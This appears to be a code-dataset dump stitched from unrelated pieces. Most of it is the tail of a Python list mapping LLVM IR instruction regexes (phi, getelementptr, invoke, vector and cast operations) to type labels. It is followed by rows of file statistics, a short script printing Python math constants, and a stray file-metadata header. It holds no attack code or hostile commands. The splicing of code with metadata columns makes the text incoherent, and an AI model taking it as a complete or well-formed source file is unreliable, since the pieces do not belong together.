['<%ID> = phi i128\*\* .*', 'i128** operation', 'int** operation'],
['<%ID> = phi i1\*\*\* .*', 'i1*** operation', 'int*** operation'],
['<%ID> = phi i2\*\*\* .*', 'i2*** operation', 'int*** operation'],
['<%ID> = phi i4\*\*\* .*', 'i4*** operation', 'int*** operation'],
['<%ID> = phi i8\*\*\* .*', 'i8*** operation', 'int*** operation'],
['<%ID> = phi i16\*\*\* .*', 'i16*** operation', 'int*** operation'],
['<%ID> = phi i32\*\*\* .*', 'i32*** operation', 'int*** operation'],
['<%ID> = phi i64\*\*\* .*', 'i64*** operation', 'int*** operation'],
['<%ID> = phi i128\*\*\* .*', 'i128*** operation', 'int*** operation'],
['<%ID> = phi x86_fp80 .*', 'float operation', 'floating point operation'],
['<%ID> = phi float .*', 'float operation', 'floating point operation'],
['<%ID> = phi double .*', 'double operation', 'floating point operation'],
['<%ID> = phi <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = phi <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = phi <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = phi x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = phi <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = phi <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = phi <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = phi <\d+ x x86_fp80>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = phi <\d+ x float>\* .*', '<d x float>* operation', '<d x floating point>* operation'],
['<%ID> = phi <\d+ x double>\* .*', '<d x double>* operation', '<d x floating point>* operation'],
['<%ID> = phi x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = phi float\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = phi double\* .*', 'double* operation', 'floating point* operation'],
['<%ID> = phi x86_fp80\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = phi float\*\* .*', 'float** operation', 'floating point** operation'],
['<%ID> = phi double\*\* .*', 'double** operation', 'floating point** operation'],
['<%ID> = phi x86_fp80\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = phi float\*\*\* .*', 'float*** operation', 'floating point*** operation'],
['<%ID> = phi double\*\*\* .*', 'double*** operation', 'floating point*** operation'],
['<%ID> = phi void \(.*\) \[.*', 'function op', 'function op'],
['<%ID> = phi void \(.*\)\* \[.*', 'function* op', 'function* op'],
['<%ID> = phi void \(.*\)\*\* \[.*', 'function** op', 'function** op'],
['<%ID> = phi void \(.*\)\*\*\* \[.*', 'function*** op', 'function*** op'],
['<%ID> = phi (<?{|opaque|<%ID>) .*', 'struct/class op', 'struct/class op'],
['<%ID> = phi (<?{|opaque|<%ID>)\* .*', 'struct/class* op', 'struct/class* op'],
['<%ID> = phi (<?{|opaque|<%ID>)\*\* .*', 'struct/class** op', 'struct/class** op'],
['<%ID> = phi (<?{|opaque|<%ID>)\*\*\* .*', 'struct/class*** op', 'struct/class*** op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i1, .*', 'i1 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i2, .*', 'i2 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i4, .*', 'i4 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i8, .*', 'i8 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i16, .*', 'i16 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i32, .*', 'i32 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i64, .*', 'i64 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i128, .*', 'i128 operation', 'int operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i1\*, .*', 'i1* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i2\*, .*', 'i2* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i4\*, .*', 'i4* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i8\*, .*', 'i8* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i16\*, .*', 'i16* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i32\*, .*', 'i32* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i64\*, .*', 'i64* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i128\*, .*', 'i128* operation', 'int* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i1\*\*, .*', 'i1** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i2\*\*, .*', 'i2** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i4\*\*, .*', 'i4** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i8\*\*, .*', 'i8** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i16\*\*, .*', 'i16** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i32\*\*, .*', 'i32** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i64\*\*, .*', 'i64** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'i128\*\*, .*', 'i128** operation', 'int** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'x86_fp80, .*', 'float operation', 'floating point operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'float, .*', 'float operation', 'floating point operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'double, .*', 'double operation', 'floating point operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'x86_fp80\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'float\*, .*', 'float* operation', 'floating point* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'double\*, .*', 'double* operation', 'floating point* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'x86_fp80\*\*, .*', 'float** operation',
'floating point** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'float\*\*, .*', 'float** operation', 'floating point** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'double\*\*, .*', 'double** operation', 'floating point** operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '%".*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<%.*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + 'opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i1>, .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i2>, .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i4>, .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i8>, .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i16>, .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i32>, .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i64>, .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i128>, .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x x86_fp80>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x float>, .*', '<d x float> operation',
'<d x floating point> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x double>, .*', '<d x double> operation',
'<d x floating point> operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i1>\*, .*', '<d x i1>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i2>\*, .*', '<d x i2>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i4>\*, .*', '<d x i4>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i8>\*, .*', '<d x i8>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i16>\*, .*', '<d x i16>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i32>\*, .*', '<d x i32>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i64>\*, .*', '<d x i64>* operation', '<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x i128>\*, .*', '<d x i128>* operation',
'<d x int>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x x86_fp80>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x float>\*, .*', '<d x float>* operation',
'<d x floating point>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '<\d+ x double>\*, .*', '<d x double>* operation',
'<d x floating point>* operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i1\], .*', '[d x i1] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i2\], .*', '[d x i2] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i4\], .*', '[d x i4] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i8\], .*', '[d x i8] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i16\], .*', '[d x i16] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i32\], .*', '[d x i32] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i64\], .*', '[d x i64] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i128\], .*', '[d x i128] operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x x86_fp80\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x float\], .*', '[d x float] operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x double\], .*', '[d x double] operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x .*\], .*', 'array of array operation',
'array of array operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i1\]\*, .*', '[d x i1]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i2\]\*, .*', '[d x i2]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i4\]\*, .*', '[d x i4]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i8\]\*, .*', '[d x i8]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i16\]\*, .*', '[d x i16]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i32\]\*, .*', '[d x i32]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i64\]\*, .*', '[d x i64]* operation', '[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i128\]\*, .*', '[d x i128]* operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x x86_fp80\]\*, .*', '[d x float]* operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x float\]\*, .*', '[d x float]* operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x double\]\*, .*', '[d x double]* operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x .*\]\*, .*', 'array of array* operation',
'array of array operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i1\]\*\*, .*', '[d x i1]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i2\]\*\*, .*', '[d x i2]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i4\]\*\*, .*', '[d x i4]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i8\]\*\*, .*', '[d x i8]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i16\]\*\*, .*', '[d x i16]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i32\]\*\*, .*', '[d x i32]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i64\]\*\*, .*', '[d x i64]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x i128\]\*\*, .*', '[d x i128]** operation',
'[d x int] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x x86_fp80\]\*\*, .*', '[d x float]** operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x float\]\*\*, .*', '[d x float]** operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x double\]\*\*, .*', '[d x double]** operation',
'[d x floating point] operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '\[\d+ x .*\], .*', 'array of array** operation',
'array of array operation'],
['<%ID> = getelementptr ' + any_of(opt_GEP) + '.*\(.*\)\*+, .*', 'function operation', 'function operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i1 .*', 'i1 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i2 .*', 'i2 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i4 .*', 'i4 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i8 .*', 'i8 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i16 .*', 'i16 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i32 .*', 'i32 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i64 .*', 'i64 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i128 .*', 'i128 operation', 'int operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i1\* .*', 'i1* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i2\* .*', 'i2* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i4\* .*', 'i4* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i8\* .*', 'i8* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i16\* .*', 'i16* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i32\* .*', 'i32* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i64\* .*', 'i64* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*i128\* .*', 'i128* operation', 'int* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*x86_fp80 .*', 'float operation', 'floating point operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*float .*', 'float operation', 'floating point operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*double .*', 'double operation', 'floating point operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*x86_fp80\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*float\* .*', 'float* operation', 'floating point* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*double\* .*', 'double* operation', 'floating point* operation'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*%".*', 'struct/class op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*<?{.*', 'struct/class op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*opaque.*', 'struct/class op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*%".*\*.*', 'struct/class* op', 'struct/class op'],
['<%ID> = invoke ' + any_of(opt_invoke) + '*void .*', 'void op', 'void op'],
['invoke ' + any_of(opt_invoke) + '*void .*', 'void op', 'void op'],
['<%ID> = extractelement <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = extractelement <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = extractelement <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = extractelement <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = extractelement <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = extractelement <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = extractelement <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = extractelement <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = extractelement <\d+ x \{.*\}> .*', '<d x struct> operation', '<d x struct> operation'],
['<%ID> = extractelement <\d+ x \{.*\}\*> .*', '<d x struct*> operation', '<d x struct*> operation'],
['<%ID> = insertelement <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = insertelement <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = insertelement <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = insertelement <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = insertelement <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = insertelement <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = insertelement <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = insertelement <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = insertelement <\d+ x \{.*\}> .*', '<d x struct> operation', '<d x struct> operation'],
['<%ID> = insertelement <\d+ x \{.*\}\*> .*', '<d x struct*> operation', '<d x struct*> operation'],
['<%ID> = shufflevector <\d+ x i1> .*', '<d x i1> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i1\*> .*', '<d x i1*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i2> .*', '<d x i2> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i2\*> .*', '<d x i2*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i4> .*', '<d x i4> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i4\*> .*', '<d x i4*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i8> .*', '<d x i8> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i8\*> .*', '<d x i8*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i16> .*', '<d x i16> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i16\*> .*', '<d x i16*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i32> .*', '<d x i32> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i32\*> .*', '<d x i32*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i64> .*', '<d x i64> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i64\*> .*', '<d x i64*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x i128> .*', '<d x i128> operation', '<d x int> operation'],
['<%ID> = shufflevector <\d+ x i128\*> .*', '<d x i128*> operation', '<d x int*> operation'],
['<%ID> = shufflevector <\d+ x x86_fp80> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = shufflevector <\d+ x x86_fp80\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = shufflevector <\d+ x float> .*', '<d x float> operation', '<d x floating point> operation'],
['<%ID> = shufflevector <\d+ x float\*> .*', '<d x float*> operation', '<d x floating point*> operation'],
['<%ID> = shufflevector <\d+ x double> .*', '<d x double> operation', '<d x floating point> operation'],
['<%ID> = shufflevector <\d+ x double\*> .*', '<d x double*> operation', '<d x floating point*> operation'],
['<%ID> = shufflevector <\d+ x \{.*\}> .*', '<d x struct> operation', '<d x struct> operation'],
['<%ID> = shufflevector <\d+ x \{.*\}\*> .*', '<d x struct*> operation', '<d x struct*> operation'],
['<%ID> = bitcast void \(.* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque) .* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\* .* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\* .* to .*', 'in-between operation',
'in-between operation'],
['<%ID> = bitcast (i\d+|float|double|x86_fp80|opaque)\*\*\* .* to .*', 'in-between operation',
'in-between operation'],
['<%ID> = bitcast \[\d+.* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast <\d+.* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = bitcast (%"|<%|<?{).* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = fpext .*', 'in-between operation', 'in-between operation'],
['<%ID> = fptrunc .*', 'in-between operation', 'in-between operation'],
['<%ID> = sext .*', 'in-between operation', 'in-between operation'],
['<%ID> = trunc .* to .*', 'in-between operation', 'in-between operation'],
['<%ID> = zext .*', 'in-between operation', 'in-between operation'],
['<%ID> = sitofp .*', 'in-between operation', 'in-between operation'],
['<%ID> = uitofp .*', 'in-between operation', 'in-between operation'],
['<%ID> = inttoptr .*', 'in-between operation', 'in-between operation'],
['<%ID> = ptrtoint .*', 'in-between operation', 'in-between operation'],
['<%ID> = fptosi .*', 'in-between operation', 'in-between operation'],
['<%ID> = fptoui .*', 'in-between operation', 'in-between operation'],
['<%ID> = extractvalue .*', 'in-between operation', 'in-between operation'],
['<%ID> = insertvalue .*', 'in-between operation', 'in-between operation'],
['resume .*', 'in-between operation', 'in-between operation'],
['(tail |musttail |notail )?call( \w+)? void .*', 'call void', 'call void'],
["i\d{1,2} <(INT|FLOAT)>, label <%ID>", 'blob', 'blob'],
["<%ID> = select .*", 'blob', 'blob'],
[".*to label.*unwind label.*", 'blob', 'blob'],
["catch .*", 'blob', 'blob'],
["cleanup", 'blob', 'blob'],
["<%ID> = landingpad .", 'blob', 'blob'],
["; <label>:<LABEL>", 'blob', 'blob'],
["<LABEL>:", 'blob', 'blob'],
["br i1 .*", 'blob', 'blob'],
["br label .*", 'blob', 'blob'],
["indirectbr .*", 'blob', 'blob'],
["switch .*", 'blob', 'blob'],
["unreachable.*", 'blob', 'blob'],
["ret void", 'blob', 'blob'],
['!UNK', 'blob', 'blob']
]
| 79.505495
| 156
| 0.523566
| 19,348
| 151,935
| 4.002222
| 0.025636
| 0.049874
| 0.132162
| 0.086602
| 0.905237
| 0.896223
| 0.876322
| 0.833912
| 0.82588
| 0.822018
| 0
| 0.029515
| 0.196775
| 151,935
| 1,910
| 157
| 79.54712
| 0.605
| 0.020858
| 0
| 0.109348
| 0
| 0.016431
| 0.639432
| 0.013325
| 0.000567
| 0
| 0
| 0.000524
| 0.004533
| 1
| 0.005099
| false
| 0
| 0.002266
| 0
| 0.011898
| 0.000567
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6c2f12ec39af1443ccbdf0435b30b7c9f65f834
| 107
|
py
|
Python
|
Basic/15_python_math/math_konstanta.py
|
sekilas13/Python
|
8b2c91cf0c90ebaba7a22e97bd69dae7a6564714
|
[
"MIT"
] | 79
|
2021-09-12T02:31:14.000Z
|
2022-03-29T08:46:53.000Z
|
Basic/15_python_math/math_konstanta.py
|
sekilas13/Python
|
8b2c91cf0c90ebaba7a22e97bd69dae7a6564714
|
[
"MIT"
] | 121
|
2021-09-10T02:38:47.000Z
|
2022-03-30T03:30:35.000Z
|
Basic/15_python_math/math_konstanta.py
|
sekilas13/Python
|
8b2c91cf0c90ebaba7a22e97bd69dae7a6564714
|
[
"MIT"
] | 76
|
2021-09-10T02:27:28.000Z
|
2022-03-28T10:24:12.000Z
|
import math
print(math.pi)
print(math.e)
print(math.tau)
print(math.inf)
print(-math.inf)
print(math.nan)
| 11.888889
| 16
| 0.738318
| 20
| 107
| 3.95
| 0.4
| 0.683544
| 0.303797
| 0.43038
| 0.417722
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.084112
| 107
| 8
| 17
| 13.375
| 0.806122
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.142857
| 0
| 0.142857
| 0.857143
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
e6f9cd1efc6f985b045e9ee3c14571c3c8ae2506
| 6,792
|
py
|
Python
|
tests/filters/test_datetime_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 14
|
2016-08-15T13:08:55.000Z
|
2021-11-17T11:43:20.000Z
|
tests/filters/test_datetime_filters.py
|
Bilonan/django-binder
|
d2d9b504a92029a0afc616be81a08f0deddd5b64
|
[
"MIT"
] | 141
|
2016-08-14T15:36:35.000Z
|
2022-02-17T08:53:52.000Z
|
